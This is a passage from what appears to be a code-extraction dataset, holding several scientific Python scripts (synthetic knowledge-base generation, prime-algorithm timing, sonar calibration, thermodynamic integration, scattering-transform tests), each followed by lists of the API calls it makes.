if fb_densities[arity-1] > random.uniform(0, 1.0):
fb_prefix = "REL$"
if arity == 1:
rel = fb_prefix+"u"
elif arity == 2:
rel = fb_prefix+"b"
else:
rel = fb_prefix+"t"
rel += str(i)
if not arity in relations_per_arity:
relations_per_arity[arity] = list()
relations_per_arity[arity].append(rel)
for args in random.sample(entities_per_arity[arity],
int(len(entities_per_arity[arity]) * fact_prob)):
self.kb.add_train(rel, args)
inverse = []
# sample symmetric relations r(X,Y) => r(Y,X)
if 2 in relations_per_arity:
symm = random.sample([(x, x) for x in relations_per_arity[2]], num_symm)
inverse += symm
# sampling implication, reversed: r1(X,Y) => r2(Y,X)
if 2 in relations_per_arity:
inverse += random.sample([(x, y) for x in relations_per_arity[2]
for y in relations_per_arity[2]
if not x == y], num_impl_inv)
if len(inverse) > 0:
self.kb.add_formulae("inv", {2: inverse})
# sampling implications:
# r1(X) => r2(X)
# r1(X,Y) => r2(X,Y)
implications_per_arity = {}
for arity in range(1, len(num_relations_per_arity) + 1):
if arity in relations_per_arity:
implications_per_arity[arity] = \
random.sample([(x, y) for x in relations_per_arity[arity] for y in relations_per_arity[arity]
if not x == y], num_impl[arity - 1])
self.kb.add_formulae("impl", implications_per_arity)
# sampling implications with conjunction in body:
# r1(X,Y) ^ r2(X,Y) => r3(X,Y)
# r1(X) ^ r2(X) => r3(X)
implications_with_conjunction_per_arity = {}
for arity in range(1, len(num_relations_per_arity) + 1):
if arity in relations_per_arity and len(relations_per_arity[arity]) >= 3:
implications_with_conjunction_per_arity[arity] = \
random.sample([(x, y, z) for x in relations_per_arity[arity]
for y in relations_per_arity[arity]
for z in relations_per_arity[arity]
if not x == y and not y == z and not z == x],
num_impl_conj[arity - 1])
self.kb.add_formulae("impl_conj", implications_with_conjunction_per_arity)
# sampling transitivities:
transitivities = []
# (1) simple transitivities r(X,Y) ^ r(Y,Z) => r(X,Z)
# (2) general transitivities r1(X,Y) ^ r2(Y,Z) => r3(X,Z) (r1, r2, r3 differ)
if 2 in relations_per_arity:
if num_trans_single > 0:
transitivities += random.sample([(x, x, x)
for x in relations_per_arity[2]], num_trans_single)
if num_trans_diff > 0:
transitivities += random.sample([(x, y, z)
for x in relations_per_arity[2]
for y in relations_per_arity[2]
for z in relations_per_arity[2]
if not x == y and
not y == z and
not z == x], num_trans_diff)
if len(transitivities) > 0:
self.kb.add_formulae("trans", {2: transitivities})
# todo: sampling negation (also applies to all heads of formulae above):
# r1 => !r2
def get_kb(self):
return self.kb
if __name__=="__main__":
import sys
import argparse
import os
#fixed args
sampled_unobserved_per_true = 1 # number of false (unobserved) test facts added for each true test fact (inferred from clause)
simple_transitivities = False
seed = 846
np.random.seed(seed)
#input args
argparser = argparse.ArgumentParser('create artificial dataset (train+test) with rules (all arity 2)')
argparser.add_argument('--entities', '-E', required=True, type=int, help='number of entities')
argparser.add_argument('--predicates', '-P', required=True, type=int, help='number of predicates')
argparser.add_argument('--test-prob', type=float, default=0.5,
help='fraction of inferred facts (from formulae) to be added to test set')
argparser.add_argument('--arg-density', type=float, default=0.1,
help='fraction of all possible pairs of entities observed')
argparser.add_argument('--fact-prob', type=float, default=0.1,
help='for all observed pairs: fraction of those that occur with each relation')
argparser.add_argument('--symm', type=int, default=0,
help='number of clauses p(X0, X1) :- p(X1, X0)')
argparser.add_argument('--impl', type=int, default=0,
help='number of clauses p(X0, X1) :- q(X0, X1) (with p and q different)')
argparser.add_argument('--impl-inv', type=int, default=0,
help='number of clauses p(X0, X1) :- q(X1, X0)')
argparser.add_argument('--impl-conj', type=int, default=0,
help='number of clauses r(X0, X1) :- p(X0, X1), q(X0, X1)')
argparser.add_argument('--trans-single', type=int, default=0,
help='number of clauses r(X0, X2) :- r(X0, X1), r(X1, X2)')
argparser.add_argument('--trans-diff', type=int, default=0,
help='number of clauses r(X0, X2) :- p(X0, X1), q(X1, X2) (with p,q,r different)')
argparser.add_argument('--dir', type=str, default='../../data/synth/sampled',
help='target directory')
argparser.add_argument('--tag', type=str, default='synth',
help='experiment tag')
args = argparser.parse_args(sys.argv[1:])
cmd = ' '.join(arg for arg in sys.argv[1:])
Ne = args.entities
Nr = args.predicates
test_prob = args.test_prob
arg_density = args.arg_density
fact_prob = args.fact_prob
num_symm = args.symm
num_impl = args.impl
num_impl_inv = args.impl_inv
num_impl_conj = args.impl_conj
num_trans_single = args.trans_single
num_trans_diff = args.trans_diff
testKB = SampleKB(Nr, Ne,
arg_densities=[0, arg_density, 0],
fact_prob=fact_prob,
num_symm=num_symm,
num_impl_inv=num_impl_inv,
num_impl=[0, num_impl, 0],
num_impl_conj=[0, num_impl_conj, 0],
num_trans_single=num_trans_single,
num_trans_diff=num_trans_diff,
seed=seed
).get_kb()
N_original_facts = len(testKB.get_all_facts(of_types=TRAIN_LABEL))
# for fact in testKB.get_all_facts(of_types=TRAIN_LABEL):
# print(fact)
# for clause in testKB.get_formulae_strings():
# print(clause)
testKB.apply_formulae(test_prob=test_prob, sampled_unobserved_per_true=sampled_unobserved_per_true)
#create train / test file for inferbeddings
train_file = os.path.join(args.dir, args.tag + '_train.tsv')
valid_file = os.path.join(args.dir, args.tag + '_valid.tsv')
test_file = os.path.join(args.dir, args.tag + '_test.tsv')
clause_file = os.path.join(args.dir, args.tag + '_clauses.pl')
readme_file = os.path.join(args.dir, args.tag + '_config.txt')
msg = '#file: '+ args.tag + '_config.txt\n'
msg += '#%d original purely random train facts (without formulae)\n'%N_original_facts
train_facts = testKB.get_all_facts(of_types=(TRAIN_LABEL,))
msg +='#%d train facts (after creating rules and adding inferred facts to train set with prob %.3f)\n'%(len(train_facts), 1.-test_prob)
test_facts = testKB.get_all_facts(of_types=(TEST_LABEL,))
test_facts_T = [f for f in test_facts if f[1]]
test_facts_F = [f for f in test_facts if not f[1]]
msg += '#%d test facts (%d True, %d False)\n'%(len(test_facts), len(test_facts_T), len(test_facts_F))
print('\n' + msg)
for clause in testKB.get_formulae_for_ntp_strings():
print(clause)
with open(readme_file, 'w') as rf:
rf.write('\n#command:\npython3 %s\n'%' '.join(list(sys.argv)))
rf.write('\n#config:\n')
for k in ['tag', 'entities', 'predicates', 'test_prob', 'arg_density', 'fact_prob',
'symm', 'impl', 'impl_inv', 'impl_conj', 'trans_single', 'trans_diff',
'dir']:
rf.write('{}\t{}\n'.format(k, vars(args)[k]))
rf.write('seed\t{}\n'.format(seed))
rf.write('sampled_unobserved_per_true\t{}\n'.format(sampled_unobserved_per_true))
rf.write('simple_transitivities\t{}\n'.format(simple_transitivities))
rf.write('\n#stats:\n')
rf.write(msg)
with open(train_file, 'w') as trf:
for fact in sorted(testKB.get_all_facts(of_types=TRAIN_LABEL)):
pred, (subj, obj) = fact[0]
trf.write('{}\t{}\t{}\n'.format(subj, pred, obj))
with open(valid_file, 'w') as vaf:
        # simple strategy for the artificial setting: tune on the train data;
        # but for AUC evaluation we also need false train facts
        # (sampled_unobserved_per_true randomly sampled unobserved facts per positive train fact)
nb_pos_test = int(len(testKB.get_all_facts(of_types=TEST_LABEL))/(sampled_unobserved_per_true+1.))
train_facts_True = testKB.get_all_facts(of_types=TRAIN_LABEL)
np.random.shuffle(train_facts_True)
valid_facts_True = train_facts_True #[:nb_pos_test]
valid_facts_False = []
for (pred, (subj, obj)), truth, _ in valid_facts_True:
if truth: #should be the case
vaf.write('{}\t{}\t{}\t{}\n'.format(subj, pred, obj, {True: 1, False: 0}[truth]))
((pred_n, (subj_n, obj_n)), _, _) = testKB.sample_neg(pred, 0, 1, oracle=True)
vaf.write('{}\t{}\t{}\t{}\n'.format(subj_n, pred, obj_n, 0)) #negative fact for same relation
with open(test_file, 'w') as tef:
for fact in sorted(testKB.get_all_facts(of_types=TEST_LABEL)):
pred, (subj, obj) = fact[0]
truth = fact[1]
tef.write('{}\t{}\t{}\t{}\n'.format(subj, pred, obj, {True: 1, False: 0}[truth]))
with open(clause_file, 'w') as clf:
for clause in testKB.get_formulae_for_ntp_strings():
clf.write(clause+'\n')
|
[
"numpy.random.seed",
"argparse.ArgumentParser",
"random.uniform",
"random.sample",
"kb.KB",
"random.seed",
"os.path.join",
"numpy.random.shuffle"
] |
[((7344, 7364), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (7358, 7364), True, 'import numpy as np\n'), ((7398, 7493), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""create artificial dataset (train+test) with rules (all arity 2)"""'], {}), "(\n 'create artificial dataset (train+test) with rules (all arity 2)')\n", (7421, 7493), False, 'import argparse\n'), ((10689, 10736), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_train.tsv')"], {}), "(args.dir, args.tag + '_train.tsv')\n", (10701, 10736), False, 'import os\n'), ((10754, 10801), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_valid.tsv')"], {}), "(args.dir, args.tag + '_valid.tsv')\n", (10766, 10801), False, 'import os\n'), ((10818, 10864), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_test.tsv')"], {}), "(args.dir, args.tag + '_test.tsv')\n", (10830, 10864), False, 'import os\n'), ((10883, 10931), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_clauses.pl')"], {}), "(args.dir, args.tag + '_clauses.pl')\n", (10895, 10931), False, 'import os\n'), ((10950, 10998), 'os.path.join', 'os.path.join', (['args.dir', "(args.tag + '_config.txt')"], {}), "(args.dir, args.tag + '_config.txt')\n", (10962, 10998), False, 'import os\n'), ((1172, 1189), 'random.seed', 'random.seed', (['seed'], {}), '(seed)\n', (1183, 1189), False, 'import random\n'), ((1208, 1221), 'kb.KB', 'KB', ([], {'seed': 'seed'}), '(seed=seed)\n', (1210, 1221), False, 'from kb import KB, TRAIN_LABEL, DEV_LABEL, TEST_LABEL\n'), ((13068, 13103), 'numpy.random.shuffle', 'np.random.shuffle', (['train_facts_True'], {}), '(train_facts_True)\n', (13085, 13103), True, 'import numpy as np\n'), ((2802, 2840), 'random.sample', 'random.sample', (['pairs', 'num_pair_samples'], {}), '(pairs, num_pair_samples)\n', (2815, 2840), False, 'import random\n'), ((2857, 2899), 'random.sample', 'random.sample', (['triples', 'num_triple_samples'], {}), '(triples, num_triple_samples)\n', (2870, 2899), False, 'import random\n'), ((3961, 4026), 'random.sample', 'random.sample', (['[(x, x) for x in relations_per_arity[2]]', 'num_symm'], {}), '([(x, x) for x in relations_per_arity[2]], num_symm)\n', (3974, 4026), False, 'import random\n'), ((4177, 4296), 'random.sample', 'random.sample', (['[(x, y) for x in relations_per_arity[2] for y in relations_per_arity[2] if \n not x == y]', 'num_impl_inv'], {}), '([(x, y) for x in relations_per_arity[2] for y in\n relations_per_arity[2] if not x == y], num_impl_inv)\n', (4190, 4296), False, 'import random\n'), ((4754, 4888), 'random.sample', 'random.sample', (['[(x, y) for x in relations_per_arity[arity] for y in relations_per_arity[\n arity] if not x == y]', 'num_impl[arity - 1]'], {}), '([(x, y) for x in relations_per_arity[arity] for y in\n relations_per_arity[arity] if not x == y], num_impl[arity - 1])\n', (4767, 4888), False, 'import random\n'), ((5403, 5615), 'random.sample', 'random.sample', (['[(x, y, z) for x in relations_per_arity[arity] for y in relations_per_arity\n [arity] for z in relations_per_arity[arity] if not x == y and not y ==\n z and not z == x]', 'num_impl_conj[arity - 1]'], {}), '([(x, y, z) for x in relations_per_arity[arity] for y in\n relations_per_arity[arity] for z in relations_per_arity[arity] if not x ==\n y and not y == z and not z == x], num_impl_conj[arity - 1])\n', (5416, 5615), False, 'import random\n'), ((6154, 6230), 'random.sample', 'random.sample', (['[(x, x, x) for x in relations_per_arity[2]]', 'num_trans_single'], {}), '([(x, x, x) 
for x in relations_per_arity[2]], num_trans_single)\n', (6167, 6230), False, 'import random\n'), ((6348, 6538), 'random.sample', 'random.sample', (['[(x, y, z) for x in relations_per_arity[2] for y in relations_per_arity[2] for\n z in relations_per_arity[2] if not x == y and not y == z and not z == x]', 'num_trans_diff'], {}), '([(x, y, z) for x in relations_per_arity[2] for y in\n relations_per_arity[2] for z in relations_per_arity[2] if not x == y and\n not y == z and not z == x], num_trans_diff)\n', (6361, 6538), False, 'import random\n'), ((3154, 3176), 'random.uniform', 'random.uniform', (['(0)', '(1.0)'], {}), '(0, 1.0)\n', (3168, 3176), False, 'import random\n')]
|
'''
@author: <NAME>
'''
import time
import numpy as np
import matplotlib.pyplot as plt
from algorithms import primes1, primes2, primes3, primes4, primes5, primes6, primes7, primes8
ubounds = range(0, 10000, 100)
num = len(ubounds)
results = []
for algorithm in (primes1, primes2, primes3, primes4, primes5, primes6, primes7, primes8):
print(f'Testing algorithm {algorithm.__name__}')
results_for_current_algorithm = []
for ubound in ubounds:
starttime = time.time()
result = algorithm(ubound)
endtime = time.time()
duration = endtime - starttime
results_for_current_algorithm.append(duration)
results.append(results_for_current_algorithm)
plt.plot(np.transpose(np.array(results)), linewidth=2)
plt.xticks(range(len(ubounds))[0::10], ubounds[0::10])
plt.xlabel('Upper bound for primes')
plt.ylabel('Time in seconds to generate primes')
plt.legend(['algorithm 1', 'algorithm 2', 'algorithm 3', 'algorithm 4',
'algorithm 5', 'algorithm 6', 'algorithm 7', 'algorithm 8'], loc=2)
plt.show()
|
[
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"time.time",
"numpy.array",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((812, 848), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Upper bound for primes"""'], {}), "('Upper bound for primes')\n", (822, 848), True, 'import matplotlib.pyplot as plt\n'), ((849, 897), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Time in seconds to generate primes"""'], {}), "('Time in seconds to generate primes')\n", (859, 897), True, 'import matplotlib.pyplot as plt\n'), ((898, 1041), 'matplotlib.pyplot.legend', 'plt.legend', (["['algorithm 1', 'algorithm 2', 'algorithm 3', 'algorithm 4', 'algorithm 5',\n 'algorithm 6', 'algorithm 7', 'algorithm 8']"], {'loc': '(2)'}), "(['algorithm 1', 'algorithm 2', 'algorithm 3', 'algorithm 4',\n 'algorithm 5', 'algorithm 6', 'algorithm 7', 'algorithm 8'], loc=2)\n", (908, 1041), True, 'import matplotlib.pyplot as plt\n'), ((1050, 1060), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1058, 1060), True, 'import matplotlib.pyplot as plt\n'), ((480, 491), 'time.time', 'time.time', ([], {}), '()\n', (489, 491), False, 'import time\n'), ((545, 556), 'time.time', 'time.time', ([], {}), '()\n', (554, 556), False, 'import time\n'), ((724, 741), 'numpy.array', 'np.array', (['results'], {}), '(results)\n', (732, 741), True, 'import numpy as np\n')]
|
"""
echopype data model inherited from based class EchoData for EK60 data.
"""
import datetime as dt
import numpy as np
import xarray as xr
from .echo_data import EchoData
class EchoDataEK60(EchoData):
"""Class for manipulating EK60 echo data that is already converted to netCDF."""
def __init__(self, file_path=""):
EchoData.__init__(self, file_path)
self.tvg_correction_factor = 2 # range bin offset factor for calculating time-varying gain in EK60
def calibrate(self, save=False):
"""Perform echo-integration to get volume backscattering strength (Sv) from EK60 power data.
TODO: need to write a separate method for calculating TS as have been done for AZFP data.
Parameters
-----------
save : bool, optional
whether to save calibrated Sv output
default to ``False``
"""
# Open data set for Environment and Beam groups
ds_env = xr.open_dataset(self.file_path, group="Environment")
ds_beam = xr.open_dataset(self.file_path, group="Beam")
# Derived params
sample_thickness = ds_env.sound_speed_indicative * ds_beam.sample_interval / 2 # sample thickness
wavelength = ds_env.sound_speed_indicative / ds_env.frequency # wavelength
# Calc gain
CSv = 10 * np.log10((ds_beam.transmit_power * (10 ** (ds_beam.gain_correction / 10)) ** 2 *
wavelength ** 2 * ds_env.sound_speed_indicative * ds_beam.transmit_duration_nominal *
10 ** (ds_beam.equivalent_beam_angle / 10)) /
(32 * np.pi ** 2))
# Get TVG and absorption
range_meter = ds_beam.range_bin * sample_thickness - \
self.tvg_correction_factor * sample_thickness # DataArray [frequency x range_bin]
range_meter = range_meter.where(range_meter > 0, other=0) # set all negative elements to 0
TVG = np.real(20 * np.log10(range_meter.where(range_meter != 0, other=1)))
ABS = 2 * ds_env.absorption_indicative * range_meter
# Save TVG and ABS for noise estimation use
self.sample_thickness = sample_thickness
self.TVG = TVG
self.ABS = ABS
# Calibration and echo integration
Sv = ds_beam.backscatter_r + TVG + ABS - CSv - 2 * ds_beam.sa_correction
Sv.name = 'Sv'
# Save calibrated data into the calling instance and
# ... to a separate .nc file in the same directory as the data file
self.Sv = Sv
if save:
print('%s saving calibrated Sv to %s' % (dt.datetime.now().strftime('%H:%M:%S'), self.Sv_path))
Sv.to_netcdf(path=self.Sv_path, mode="w")
# Close opened resources
ds_env.close()
ds_beam.close()
|
[
"numpy.log10",
"xarray.open_dataset",
"datetime.datetime.now"
] |
[((956, 1008), 'xarray.open_dataset', 'xr.open_dataset', (['self.file_path'], {'group': '"""Environment"""'}), "(self.file_path, group='Environment')\n", (971, 1008), True, 'import xarray as xr\n'), ((1027, 1072), 'xarray.open_dataset', 'xr.open_dataset', (['self.file_path'], {'group': '"""Beam"""'}), "(self.file_path, group='Beam')\n", (1042, 1072), True, 'import xarray as xr\n'), ((1330, 1572), 'numpy.log10', 'np.log10', (['(ds_beam.transmit_power * (10 ** (ds_beam.gain_correction / 10)) ** 2 * \n wavelength ** 2 * ds_env.sound_speed_indicative * ds_beam.\n transmit_duration_nominal * 10 ** (ds_beam.equivalent_beam_angle / 10) /\n (32 * np.pi ** 2))'], {}), '(ds_beam.transmit_power * (10 ** (ds_beam.gain_correction / 10)) **\n 2 * wavelength ** 2 * ds_env.sound_speed_indicative * ds_beam.\n transmit_duration_nominal * 10 ** (ds_beam.equivalent_beam_angle / 10) /\n (32 * np.pi ** 2))\n', (1338, 1572), True, 'import numpy as np\n'), ((2620, 2637), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (2635, 2637), True, 'import datetime as dt\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 31 14:42:37 2019
@author: owenmadin
"""
import numpy
from bayesiantesting.kernels.bayes import ThermodynamicIntegration
from bayesiantesting.models.continuous import GaussianModel
def main():
priors = {"uniform": ("uniform", numpy.array([-5.0, 5.0]))}
# Build the model / models.
model = GaussianModel("gaussian", priors, 0.0, 1.0)
# Draw the initial parameter values from the model priors.
initial_parameters = model.sample_priors()
# Run the simulation
simulation = ThermodynamicIntegration(
legendre_gauss_degree=16,
model=model,
warm_up_steps=100000,
steps=500000,
output_directory_path="gaussian",
)
_, integral, error = simulation.run(initial_parameters, number_of_processes=4)
print("Final Integral:", integral, " +/- ", error)
print("==============================")
if __name__ == "__main__":
main()
|
[
"bayesiantesting.kernels.bayes.ThermodynamicIntegration",
"numpy.array",
"bayesiantesting.models.continuous.GaussianModel"
] |
[((377, 420), 'bayesiantesting.models.continuous.GaussianModel', 'GaussianModel', (['"""gaussian"""', 'priors', '(0.0)', '(1.0)'], {}), "('gaussian', priors, 0.0, 1.0)\n", (390, 420), False, 'from bayesiantesting.models.continuous import GaussianModel\n'), ((575, 712), 'bayesiantesting.kernels.bayes.ThermodynamicIntegration', 'ThermodynamicIntegration', ([], {'legendre_gauss_degree': '(16)', 'model': 'model', 'warm_up_steps': '(100000)', 'steps': '(500000)', 'output_directory_path': '"""gaussian"""'}), "(legendre_gauss_degree=16, model=model,\n warm_up_steps=100000, steps=500000, output_directory_path='gaussian')\n", (599, 712), False, 'from bayesiantesting.kernels.bayes import ThermodynamicIntegration\n'), ((305, 329), 'numpy.array', 'numpy.array', (['[-5.0, 5.0]'], {}), '([-5.0, 5.0])\n', (316, 329), False, 'import numpy\n')]
|
from PIL import Image
import numpy as np
img = Image.open('cifar.png')
pic = np.array(img)
noise = np.random.randint(-10,10,pic.shape[-1])
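# note: this draws one random offset per colour channel (shape (3,) for an RGB image);
# broadcasting then applies the same per-channel offset to every pixel when it is added to pic below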
print(noise.shape)
pic = pic+noise
pic = pic.astype(np.uint8)
asd = Image.fromarray(pic)
|
[
"PIL.Image.fromarray",
"numpy.random.randint",
"numpy.array",
"PIL.Image.open"
] |
[((47, 70), 'PIL.Image.open', 'Image.open', (['"""cifar.png"""'], {}), "('cifar.png')\n", (57, 70), False, 'from PIL import Image\n'), ((77, 90), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (85, 90), True, 'import numpy as np\n'), ((99, 140), 'numpy.random.randint', 'np.random.randint', (['(-10)', '(10)', 'pic.shape[-1]'], {}), '(-10, 10, pic.shape[-1])\n', (116, 140), True, 'import numpy as np\n'), ((207, 227), 'PIL.Image.fromarray', 'Image.fromarray', (['pic'], {}), '(pic)\n', (222, 227), False, 'from PIL import Image\n')]
|
import torch
from torch.autograd import Variable
from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier
from scattering.scattering1d.utils import compute_border_indices
import numpy as np
import pytest
def test_pad1D(random_state=42):
"""
Tests the correctness and differentiability of pad1D
"""
torch.manual_seed(random_state)
N = 128
for pad_left in range(0, N, 16):
for pad_right in range(0, N, 16):
x = Variable(torch.randn(100, 4, N), requires_grad=True)
x_pad = pad1D(x, pad_left, pad_right, mode='reflect')
# Check the size
x2 = x.data.clone()
x_pad2 = x_pad.data.clone()
for t in range(1, pad_left + 1):
diff = x_pad2[..., pad_left - t] - x2[..., t]
assert torch.max(torch.abs(diff)) <= 1e-7
for t in range(x2.shape[-1]):
diff = x_pad2[..., pad_left + t] - x2[..., t]
assert torch.max(torch.abs(diff)) <= 1e-7
for t in range(1, pad_right + 1):
diff = x_pad2[..., x_pad.shape[-1] - 1 - pad_right + t]
diff -= x2[..., x.shape[-1] - 1 - t]
assert torch.max(torch.abs(diff)) <= 1e-7
# check the differentiability
loss = 0.5 * torch.sum(x_pad**2)
loss.backward()
# compute the theoretical gradient for x
x_grad_original = x.data.clone()
x_grad = x_grad_original.new(x_grad_original.shape).fill_(0.)
x_grad += x_grad_original
for t in range(1, pad_left + 1):
x_grad[..., t] += x_grad_original[..., t]
for t in range(1, pad_right + 1): # it is counted twice!
t0 = x.shape[-1] - 1 - t
x_grad[..., t0] += x_grad_original[..., t0]
# get the difference
diff = x.grad.data - x_grad
assert torch.max(torch.abs(diff)) <= 1e-7
# Check that the padding shows an error if we try to pad
with pytest.raises(ValueError):
pad1D(x, x.shape[-1], 0, mode='reflect')
with pytest.raises(ValueError):
pad1D(x, 0, x.shape[-1], mode='reflect')
def test_modulus(random_state=42):
"""
Tests the stability and differentiability of modulus
"""
torch.manual_seed(random_state)
# Test with a random vector
x = Variable(torch.randn(100, 4, 128, 2), requires_grad=True)
x_abs = modulus(x)
assert len(x_abs.shape) == len(x.shape) - 1
# check the value
x_abs2 = x_abs.data.clone()
x2 = x.data.clone()
diff = x_abs2 - torch.sqrt(x2[..., 0]**2 + x2[..., 1]**2)
assert torch.max(torch.abs(diff)) <= 1e-7
# check the gradient
loss = torch.sum(x_abs)
loss.backward()
x_grad = x2 / x_abs2.unsqueeze(-1)
diff = x.grad.data - x_grad
assert torch.max(torch.abs(diff)) <= 1e-7
# Test the differentiation with a vector made of zeros
x0 = Variable(torch.zeros(100, 4, 128, 2), requires_grad=True)
x_abs0 = modulus(x0)
loss0 = torch.sum(x_abs0)
loss0.backward()
assert torch.max(torch.abs(x0.grad.data)) <= 1e-7
def test_subsample_fourier(random_state=42):
"""
Tests whether the periodization in Fourier performs a good subsampling
in time
"""
rng = np.random.RandomState(random_state)
J = 10
x = rng.randn(100, 4, 2**J) + 1j * rng.randn(100, 4, 2**J)
x_fft = np.fft.fft(x, axis=-1)[..., np.newaxis]
    x_fft.dtype = 'float64'  # view each complex value as an interleaved (real, imag) float pair
x_fft_th = torch.from_numpy(x_fft)
for j in range(J + 1):
x_fft_sub_th = subsample_fourier(x_fft_th, 2**j)
x_fft_sub = x_fft_sub_th.numpy()
x_fft_sub.dtype = 'complex128'
x_sub = np.fft.ifft(x_fft_sub[..., 0], axis=-1)
assert np.max(np.abs(x[:, :, ::2**j] - x_sub)) < 1e-7
def test_border_indices(random_state=42):
"""
Tests whether the border indices to unpad are well computed
"""
rng = np.random.RandomState(random_state)
J_signal = 10 # signal lives in 2**J_signal
J = 6 # maximal subsampling
T = 2**J_signal
i0 = rng.randint(0, T // 2 + 1, 1)[0]
i1 = rng.randint(i0 + 1, T, 1)[0]
x = np.ones(T)
x[i0:i1] = 0.
ind_start, ind_end = compute_border_indices(J, i0, i1)
for j in range(J + 1):
assert j in ind_start.keys()
assert j in ind_end.keys()
x_sub = x[::2**j]
# check that we did take the strict interior
assert np.max(x_sub[ind_start[j]:ind_end[j]]) == 0.
# check that we have not forgotten points
if ind_start[j] > 0:
assert np.min(x_sub[:ind_start[j]]) > 0.
if ind_end[j] < x_sub.shape[-1]:
assert np.min(x_sub[ind_end[j]:]) > 0.
|
[
"numpy.abs",
"torch.sqrt",
"numpy.ones",
"torch.randn",
"scattering.scattering1d.utils.subsample_fourier",
"numpy.fft.fft",
"numpy.random.RandomState",
"pytest.raises",
"scattering.scattering1d.utils.modulus",
"numpy.max",
"torch.zeros",
"scattering.scattering1d.utils.pad1D",
"numpy.fft.ifft",
"torch.manual_seed",
"scattering.scattering1d.utils.compute_border_indices",
"numpy.min",
"torch.sum",
"torch.from_numpy",
"torch.abs"
] |
[((335, 366), 'torch.manual_seed', 'torch.manual_seed', (['random_state'], {}), '(random_state)\n', (352, 366), False, 'import torch\n'), ((2321, 2352), 'torch.manual_seed', 'torch.manual_seed', (['random_state'], {}), '(random_state)\n', (2338, 2352), False, 'import torch\n'), ((2463, 2473), 'scattering.scattering1d.utils.modulus', 'modulus', (['x'], {}), '(x)\n', (2470, 2473), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((2744, 2760), 'torch.sum', 'torch.sum', (['x_abs'], {}), '(x_abs)\n', (2753, 2760), False, 'import torch\n'), ((3038, 3049), 'scattering.scattering1d.utils.modulus', 'modulus', (['x0'], {}), '(x0)\n', (3045, 3049), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((3062, 3079), 'torch.sum', 'torch.sum', (['x_abs0'], {}), '(x_abs0)\n', (3071, 3079), False, 'import torch\n'), ((3315, 3350), 'numpy.random.RandomState', 'np.random.RandomState', (['random_state'], {}), '(random_state)\n', (3336, 3350), True, 'import numpy as np\n'), ((3540, 3563), 'torch.from_numpy', 'torch.from_numpy', (['x_fft'], {}), '(x_fft)\n', (3556, 3563), False, 'import torch\n'), ((3980, 4015), 'numpy.random.RandomState', 'np.random.RandomState', (['random_state'], {}), '(random_state)\n', (4001, 4015), True, 'import numpy as np\n'), ((4209, 4219), 'numpy.ones', 'np.ones', (['T'], {}), '(T)\n', (4216, 4219), True, 'import numpy as np\n'), ((4264, 4297), 'scattering.scattering1d.utils.compute_border_indices', 'compute_border_indices', (['J', 'i0', 'i1'], {}), '(J, i0, i1)\n', (4286, 4297), False, 'from scattering.scattering1d.utils import compute_border_indices\n'), ((2046, 2071), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2059, 2071), False, 'import pytest\n'), ((2081, 2121), 'scattering.scattering1d.utils.pad1D', 'pad1D', (['x', 'x.shape[-1]', '(0)'], {'mode': '"""reflect"""'}), "(x, x.shape[-1], 0, mode='reflect')\n", (2086, 2121), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((2131, 2156), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2144, 2156), False, 'import pytest\n'), ((2166, 2206), 'scattering.scattering1d.utils.pad1D', 'pad1D', (['x', '(0)', 'x.shape[-1]'], {'mode': '"""reflect"""'}), "(x, 0, x.shape[-1], mode='reflect')\n", (2171, 2206), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((2402, 2429), 'torch.randn', 'torch.randn', (['(100)', '(4)', '(128)', '(2)'], {}), '(100, 4, 128, 2)\n', (2413, 2429), False, 'import torch\n'), ((2620, 2665), 'torch.sqrt', 'torch.sqrt', (['(x2[..., 0] ** 2 + x2[..., 1] ** 2)'], {}), '(x2[..., 0] ** 2 + x2[..., 1] ** 2)\n', (2630, 2665), False, 'import torch\n'), ((2976, 3003), 'torch.zeros', 'torch.zeros', (['(100)', '(4)', '(128)', '(2)'], {}), '(100, 4, 128, 2)\n', (2987, 3003), False, 'import torch\n'), ((3437, 3459), 'numpy.fft.fft', 'np.fft.fft', (['x'], {'axis': '(-1)'}), '(x, axis=-1)\n', (3447, 3459), True, 'import numpy as np\n'), ((3614, 3649), 'scattering.scattering1d.utils.subsample_fourier', 'subsample_fourier', (['x_fft_th', '(2 ** j)'], {}), '(x_fft_th, 2 ** j)\n', (3631, 3649), False, 'from scattering.scattering1d.utils import pad1D, modulus, subsample_fourier\n'), ((3744, 3783), 'numpy.fft.ifft', 'np.fft.ifft', (['x_fft_sub[..., 0]'], {'axis': '(-1)'}), '(x_fft_sub[..., 0], axis=-1)\n', (3755, 3783), True, 'import numpy as np\n'), ((547, 592), 'scattering.scattering1d.utils.pad1D', 'pad1D', (['x', 'pad_left', 
